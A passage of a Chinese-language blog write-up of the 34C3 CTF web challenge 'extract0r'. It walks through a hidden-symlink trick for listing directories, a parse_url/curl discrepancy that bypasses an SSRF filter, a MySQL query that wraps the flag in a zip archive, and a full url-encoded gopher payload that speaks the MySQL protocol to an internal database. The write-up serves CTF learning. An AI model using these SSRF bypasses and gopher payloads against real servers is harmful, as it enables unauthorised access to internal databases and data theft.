&#123;</span><br><span class="line">            $cntr++;</span><br><span class="line">            unlink($file);</span><br><span class="line">            @rmdir($file);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> $cntr;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><br>当时以为这个限制的很好了，就没多想。。。复现的时候一直在想怎么猜到的flag在mysql里，直到随手一试发现glob函数是有问题的。。。<br><img src="/2018/01/04/34c3-web-extract0r/3.png" alt="glob函数"><br>也就是说<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$files = glob($directory . &apos;/*&apos;);</span><br></pre></td></tr></table></figure></p>
<p>这句话，是不会显示隐藏文件的，所以如果我们软链接生成的是一个隐藏文件，那么就不会被这个函数发现，这样就能软链接一个目录来达到任意列目录的目的。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ln -s /home/extract0r/ .a</span><br><span class="line">7z a -t7z 2.7z .a</span><br></pre></td></tr></table></figure></p>
<p><img src="/2018/01/04/34c3-web-extract0r/4.png" alt="列目录"><br>这样就能找到出题人故意留下的线索，一个备份用的sh文件。<br><figure class="highlight sh"><figcaption><span>create_a_backup_of_my_supersecret_flag.sh</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">"[+] Creating flag user and flag table."</span></span><br><span class="line">mysql -h 127.0.0.1 -uroot -p &lt;&lt;<span class="string">'SQL'</span></span><br><span class="line">CREATE DATABASE  IF NOT EXISTS `flag` /*!40100 DEFAULT CHARACTER SET utf8 */;</span><br><span class="line">USE `flag`;</span><br><span class="line"></span><br><span class="line">DROP TABLE IF EXISTS `flag`;</span><br><span class="line">CREATE TABLE `flag` (</span><br><span class="line">  `flag` VARCHAR(100)</span><br><span class="line">);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">CREATE USER <span class="string">'m4st3r_ov3rl0rd'</span>@<span class="string">'localhost'</span>;</span><br><span class="line">GRANT USAGE ON *.* TO <span class="string">'m4st3r_ov3rl0rd'</span>@<span class="string">'localhost'</span>;</span><br><span class="line">GRANT SELECT ON `flag`.* TO <span class="string">'m4st3r_ov3rl0rd'</span>@<span class="string">'localhost'</span>;</span><br><span class="line">SQL</span><br><span class="line"></span><br><span class="line"><span class="built_in">echo</span> -n <span class="string">"[+] Please input the flag:"</span></span><br><span class="line"><span class="built_in">read</span> flag</span><br><span class="line"></span><br><span class="line">mysql -h 127.0.0.1 -uroot -p &lt;&lt;SQL</span><br><span class="line">INSERT INTO flag.flag VALUES (<span class="string">'$flag'</span>);</span><br><span class="line">SQL</span><br><span class="line"></span><br><span class="line"><span class="built_in">echo</span> <span class="string">"[+] Flag was succesfully backed up to mysql!"</span></span><br></pre></td></tr></table></figure></p>
<h2 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h2><ul>
<li>看这个sh文件可以发现，flag在数据库中，同时有一个无密码的m4st3r_ov3rl0rd用户可以访问这个数据库。因为mysql是支持tcp方式建立连接的，所以如果我们能发送一个构造的tcp包，就能做到和本地的3306端口通讯。这里值得注意的一点是，mysql的登录是挑战应答认证机制，认证时server端会随机发送一个salt，因此如果m4st3r_ov3rl0rd用户是有密码的，就没法在非交互的情况下完成tcp的连接。</li>
<li>如何发送tcp包？？通过gopher协议可以直接发送一个tcp包的exp。</li>
<li>因为index.php会将curl请求到的数据，用7z进行解压，所以我们还需要人为构造一个7z能解压的文件。</li>
<li>url.php限制了访问内网，需要绕过url.php<h3 id="绕过url-php"><a href="#绕过url-php" class="headerlink" title="绕过url.php"></a>绕过url.php</h3>不得不说，这个url.php是一个我看来很完善的防止ssrf的脚本。绕过url.php的方法在php的curl本身上。绕过的核心问题是，php的parse_url和curl对于url的解析存在不同。</li>
<li>官方给出的绕过是这样的:<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gopher://foo@[cafebabe.cf]@yolo.com:3306/</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p><img src="/2018/01/04/34c3-web-extract0r/5.png" alt="test1"><br>parse_url认为host是yolo.com，但是curl却认为host是[cafebabe.cf]</p>
<ul>
<li>在<a href="http://xml2rfc.tools.ietf.org/public/rfc/html/rfc3986.html" target="_blank" rel="noopener">rfc3986</a>中是这样定义host的:<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">host        = IP-literal / IPv4address / reg-name</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>然后有这么一段话<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">A host identified by an Internet Protocol literal address, version 6 or later, is distinguished by enclosing the IP literal within square brackets (&quot;[&quot; and &quot;]&quot;). This is the only place where square bracket characters are allowed in the URI syntax.</span><br><span class="line">IP-literal = &quot;[&quot; ( IPv6address / IPvFuture  ) &quot;]&quot;</span><br></pre></td></tr></table></figure></p>
<p>也就是说[cafebabe.cf]这种类型是rfc规定的一种host的形式，但是里面不应该是reg-name形式的东西。curl识别了[]，因此把这个当做了host。</p>
<ul>
<li>rr大佬的绕过是这样的<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gopher://foo@localhost:f@ricterz.me:3306</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>这个我大致的猜测是curl认为foo是userinfo段，然后localhost是host段，碰到:停止获取，就获得了localhost。不过这个payload在我本地7.47的php curl中没有成功。远程应该是7.52。</p>
<ul>
<li>对于curl和parse_url如何解析url，我做了一些测试以后，大致感觉curl的解析是从左至右找的host，而parse_url则是从右至左的找的host。</li>
<li>对于指定3306端口，因为<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$blacklisted = &quot;/[ \x08\x09\x0a\x0b\x0c\x0d\x0e:\d]/&quot;;</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>这个的缘故，orange师傅在blackhat上的那个slide里的一些姿势都不能用，比如<br><img src="/2018/01/04/34c3-web-extract0r/6.png" alt="orange"><br>因此，port只能放在最后的位置。还有这上面这个payload在php curl7.47里也不行，不知道为什么低版本反倒比高版本不容易绕过</p>
<h3 id="mysql构造压缩包"><a href="#mysql构造压缩包" class="headerlink" title="mysql构造压缩包"></a>mysql构造压缩包</h3><ul>
<li>因为index.php会将拿到的数据用7z解压，所以我们不能只select一个flag，而是要select出一个压缩包的文件。但用mysql实现一个压缩算法什么的把找出来的flag压缩应该是不太可行的。。。我的第一反应是类似tar的打包。就是我们放的是无损的数据就不会存在这个问题。</li>
<li>tar和zip都有这样的功能，zip的-n参数可以不压缩具有特定字尾字符串的文件。</li>
<li>这样就可以先构造一个比如100个’A’的文件，然后用zip -n的方式压缩它，效果如图：<br><img src="/2018/01/04/34c3-web-extract0r/7.png" alt="zip"></li>
<li>然后可以通过把select出来的flag替换到对应的位置，万幸的是crc校验不对7z也能够解压23333</li>
<li>这样的话，flag前后，我们可以用cast把这个构造的压缩包的内容依葫芦画瓢转化成字节，然后用concat把前后加flag的内容拼起来就ok了。<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;use flag;SELECT cast(concat(0x504B03040A00000000000E4F244C8DBC9795640000006400000001001C00325554090003CB894D5AD7894D5A75780B000104E803000004E8030000,rpad(flag,100,&apos;A&apos;),0x504B01021E030A00000000000E4F244C8DBC97956400000064000000010018000000000000000000A48100000000325554050003CB894D5A75780B000104E803000004E8030000504B05060000000001000100470000009F0000000000) AS BINARY) from flag;&quot;|mysql -h127.0.0.1 -um4st3r_ov3rl0rd</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h3 id="构造tcp包"><a href="#构造tcp包" class="headerlink" title="构造tcp包"></a>构造tcp包</h3><ul>
<li>tcp包的构造，可以像官方给的exp一样，通过实现mysql的tcp通信方式来直接构造；也可以取巧一点，通过抓包的方式获得。</li>
<li>mysql的通信，可以参考这篇<a href="http://www.jb51.net/article/131681.htm" target="_blank" rel="noopener">http://www.jb51.net/article/131681.htm</a></li>
<li>抓包的话有一个比较坑的地方，搞的我之前怎么抓也没抓到。就是你本地使用mysql的时候使用Unix套接字来通信的。需要加一个 -h127.0.0.1 的参数才是通过tcp来通信。</li>
<li>抓到包以后把发送给server的提取出来，保存它的hex值就好了。<br><img src="/2018/01/04/34c3-web-extract0r/8.png" alt="mysql"><br>先抓包再研究mysql的通信过程也是个不错的选择。<h3 id="gopher发包"><a href="#gopher发包" class="headerlink" title="gopher发包"></a>gopher发包</h3>这部分很简单，把刚刚提取到的hex值变成url编码的形式，加上<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gopher://foo@[cafebabe.cf]@rebirthwyw.xyz:3306/_</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>就大功告成了。<br>最后的payload是<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gopher://foo@[cafebabe.cf]@rebirthwyw.xyz:3306/_%AD%00%00%01%85%A2%BF%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6D%34%73%74%33%72%5F%6F%76%33%72%6C%30%72%64%00%00%6D%79%73%71%6C%5F%6E%61%74%69%76%65%5F%70%61%73%73%77%6F%72%64%00%65%03%5F%6F%73%05%4C%69%6E%75%78%0C%5F%63%6C%69%65%6E%74%5F%6E%61%6D%65%08%6C%69%62%6D%79%73%71%6C%04%5F%70%69%64%04%31%38%39%35%0F%5F%63%6C%69%65%6E%74%5F%76%65%72%73%69%6F%6E%06%35%2E%37%2E%32%30%09%5F%70%6C%61%74%66%6F%72%6D%06%78%38%36%5F%36%34%0C%70%72%6F%67%72%61%6D%5F%6E%61%6D%65%05%6D%79%73%71%6C%21%00%00%00%03%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%5F%63%6F%6D%6D%65%6E%74%20%6C%69%6D%69%74%20%31%12%00%00%00%03%53%45%4C%45%43%54%20%44%41%54%41%42%41%53%45%28%29%05%00%00%00%02%66%6C%61%67%72%01%00%00%03%53%45%4C%45%43%54%20%63%61%73%74%28%63%6F%6E%63%61%74%28%30%78%35%30%34%42%30%33%30%34%30%41%30%30%30%30%30%30%30%30%30%30%30%45%34%46%32%34%34%43%38%44%42%43%39%37%39%35%36%34%30%30%30%30%30%30%36%34%30%30%30%30%30%30%30%31%30%30%31%43%30%30%33%32%35%35%35%34%30%39%30%30%30%33%43%42%38%39%34%44%35%41%44%37%38%39%34%44%35%41%37%35%37%38%30%42%30%30%30%31%30%34%45%38%30%33%30%30%30%30%30%34%45%38%30%33%30%30%30%30%2C%72%70%61%64%28%66%6C%61%67%2C%31%30%30%2C%27%41%27%29%2C%30%78%35%30%34%42%30%31%30%32%31%45%30%33%30%41%30%30%30%30%30%30%30%30%30%30%30%45%34%46%32%34%34%43%38%44%42%43%39%37%39%35%36%34%30%30%30%30%30%30%36%34%30%30%30%30%30%30%30%31%30%30%31%38%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%41%34%38%31%30%30%30%30%30%30%30%30%33%32%35%35%35%34%30%35%30%30%30%33%43%42%38%39%34%44%35%41%37%35%37%38%30%42%30%30%30%31%30%34%45%38%30%33%30%30%30%30%30%34%45%38%30%33%30%30%30%30%35%30%34%42%30%35%30%36%30%30%30%30%30%30%30%30%30%31%30%30%30%31%30%30%34%37%30%30%30%30%30%30%39%46%30%30%30%30%30%30%30%30%30%30%29%20%41%53%20%42%49%4E%41%52%59%29%20%66%72%6F%6D%20%66%6C%61%67%01%00%00%00%01</span><br></pre></td></tr></table></figure></p>
<p>最后的一点是，你抓包的话不难发现mysql除了返回给你值，在前面还会有一些信息，但是7z牛逼啊，不管前面的内容也能给你解压出来23333</p>
<h2 id="大功告成"><a href="#大功告成" class="headerlink" title="大功告成"></a>大功告成</h2><p><img src="/2018/01/04/34c3-web-extract0r/9.png" alt="flag"></p>

      </div>
      <div class="post-copyright">
    <p class="copyright-item">
      <span>Author: </span>
      <a href="https://rebirthwyw.com">rebirth</a>
    </p>
    <p class="copyright-item">
      <span>Link: </span>
      <a href="https://rebirthwyw.com/2018/01/04/34c3-web-extract0r/">https://rebirthwyw.com/2018/01/04/34c3-web-extract0r/</a>
    </p>
    <p class="copyright-item">
      <span>License: </span><a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/" target="_blank">知识共享署名-非商业性使用 4.0 国际许可协议</a>
    </p>
  </div>
      <footer class="post-footer">
        <div class="post-tags">
            <a href="/tags/ctf/">ctf</a>
            </div>
        
        <nav class="post-nav"><a class="prev" href="/2019/05/24/defcon-quals-2019-ooops/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">defcon quals 2019 ooops</span>
        <span class="prev-text nav-mobile">Prev</span>
      </a>
    </nav></footer>
    </article></div><div class="comments" id="comments"><div id="lv-container" data-id="city" data-uid="MTAyMC80NDExMy8yMDY0OA==">
        <noscript>为正常使用来必力评论功能请激活JavaScript</noscript>
      </div>  
    </div></div>
      </main>

      <footer id="footer" class="footer"><div class="social-links"><a href="mailto:rebirthwyw@gmail.com" class="iconfont icon-email" title="email"></a>
        <a href="https://twitter.com/rebirthwyw1" class="iconfont icon-twitter" title="twitter"></a>
        <a href="https://github.com/rebirthwyw" class="iconfont icon-github" title="github"></a>
        <a href="/atom.xml" class="iconfont icon-rss" title="rss"></a>
    </div><div class="copyright">
  <span class="power-by">
    Powered by <a class="hexo-link" href="https://hexo.io/">Hexo</a>
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    Theme - 
    <a class="theme-link" href="https://github.com/ahonn/hexo-theme-even">Even</a>
  </span>

  <span class="copyright-year"><a href="http://www.beian.miit.gov.cn" rel="noopener" target="_blank">京ICP备19051299号</a>&copy;2018 - 2021<span class="heart">
      <i class="iconfont icon-heart"></i>
    </span>
    <span class="author">rebirth</span>
  </span>
</div>
</footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div><script type="text/javascript">
	(function(d, s) {
       var j, e = d.getElementsByTagName(s)[0];

       if (typeof LivereTower === 'function') { return; }

       j = d.createElement(s);
       j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
       j.async = true;

       e.parentNode.insertBefore(j, e);
   })(document, 'script');
  </script><script type="text/javascript" src="/lib/jquery/jquery.min.js"></script>
  <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  <script type="text/javascript" src="/lib/pjax/jquery.pjax.min.js"></script>
  <script type="text/javascript" src="/lib/nprogress/nprogress.min.js"></script>
  <script type="text/javascript" src="/js/src/even.js?v=2.11.0"></script>
</body>
</html>
